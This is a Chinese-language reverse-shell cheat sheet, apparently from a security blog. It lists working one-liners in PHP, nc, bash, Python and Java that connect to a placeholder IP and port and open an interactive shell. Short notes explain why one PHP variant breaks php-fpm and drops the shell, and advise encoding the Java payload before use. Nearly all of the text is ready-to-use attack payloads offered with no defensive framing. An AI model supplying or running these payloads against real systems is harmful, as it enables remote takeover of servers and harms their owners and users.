php
1
| php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
|
以上这种方法可能在一定情况下存在反弹一下就断掉的情况,主要原因是:执行如上代码的话,会把系统的标准输入输出重定向到/bin/sh里,导致php-fpm直接502,然后弹的shell也会瞬间掉了,所以可以采用以下命令进行反弹shell
1
| php -r '$sock = fsockopen("ip", port);$descriptorspec = array(0 => $sock,1 => $sock,2 => $sock);$process = proc_open("/bin/sh", $descriptorspec, $pipes);proc_close($process);'
|
1
| <?php $sock=fsockopen("ip", port);exec("/bin/bash -i <&3 >&3 2>&3"); ?>
|
nc
1
| nc -e /bin/bash [ip] [port]
|
bash
1
| bash -i >& /dev/tcp/ip/port 0>&1
|
1
| sh -i >& /dev/tcp/ip/port 0>&1
|
1
| /bin/bash -i >& /dev/tcp/ip/port 0>&1
|
python
1
| python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
|
java
1
2
3
| Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"});
p.waitFor();
|
通常”/bin/bash”,”-c”,”exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done”进行编码后使用